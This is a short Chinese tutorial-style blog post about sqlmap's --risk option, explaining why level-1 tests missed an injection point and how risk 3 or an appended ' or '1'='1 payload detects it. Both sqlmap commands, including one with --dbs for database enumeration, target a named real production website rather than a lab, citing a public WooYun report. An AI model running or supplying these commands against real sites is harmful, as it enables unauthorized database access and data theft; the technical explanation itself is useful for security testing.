1. 云栖社区>
  2. PHP教程>
  3. 正文

sqlmap risk 参数

作者:用户 来源:互联网 时间:2017-12-01 11:06:36

参数

sqlmap risk 参数 - 摘要: 本文讲的是sqlmap risk 参数, 测试一个注入点,手工测试验证应该存在注入但是用sqlmap没跑出来。测试发现需要指定risk 3,sqlmap才会使用or语句进行测试,才可以识别出这个注入点。 python sqlmap.py -u "http://comment.1

测试一个注入点,手工测试验证应该存在注入但是用sqlmap没跑出来。测试发现需要指定risk 3,sqlmap才会使用or语句进行测试,才可以识别出这个注入点。

python sqlmap.py -u "http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=8820309115951&name=" --random-agent -v 1 -p code --level 5 --dbs --dbms=mysql --risk 3

这是乌云上一个公开的漏洞。之所以用and无法识别出来是因为code的参数本身是无效的,数据查询的结果为空,所以再拼接and语句,查询条件还是false。

sqlmap risk 参数

可以直接在code参数后面拼接一个or语句。然后再拼接and语句就可以正常注入了。

sqlmap risk 参数

所以这里可以直接使用risk 3参数或者在code参数后面拼or语句。

python sqlmap.py -u "http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=8820309115951' or '1'='1&name=" --random-agent -v 1 -p code --level 1 --dbs --dbms=mysql --risk 1

以上是云栖社区小编为您精心准备的的内容,在云栖社区的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索参数 ,以便于您获取更多的相关知识。